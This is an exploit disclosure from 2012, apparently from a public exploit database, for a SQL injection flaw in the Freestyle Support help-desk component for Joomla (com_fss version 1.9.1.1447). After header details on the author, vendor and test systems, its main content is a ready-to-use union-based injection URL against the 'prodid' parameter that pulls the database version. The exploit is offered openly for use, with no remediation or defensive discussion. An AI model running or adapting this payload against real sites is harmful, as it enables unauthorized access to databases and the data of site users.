40 lines
No EOL
1.1 KiB
Text
40 lines
No EOL
1.1 KiB
Text
Exploit Title: Joomla Freestyle Support com_fss sqli
|
|
|
|
Dork: N/A
|
|
|
|
Date: [17-10-2012]
|
|
|
|
Author: Daniel Barragan "D4NB4R"
|
|
|
|
Twitter: @D4NB4R
|
|
|
|
Vendor: http://freestyle-joomla.com
|
|
|
|
Version: Version 1.9.1.1447 (last update on Oct 15, 2012)
|
|
|
|
License: Commercial
|
|
|
|
Download: http://freestyle-joomla.com/fssdownloads
|
|
|
|
Tested on: [Linux(bt5)-Windows(7ultimate)]
|
|
|
|
Especial greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt
|
|
|
|
|
|
Descripcion joomla component:
|
|
|
|
Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.
|
|
|
|
Warning: Invalid argument supplied for foreach() in
|
|
|
|
|
|
Exploit:
|
|
|
|
|
|
SQL : SQL injection
|
|
|
|
http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
|
|
|
|
|
|
_____________________________________________________
|
|
Daniel Barragan "D4NB4R" 2012 |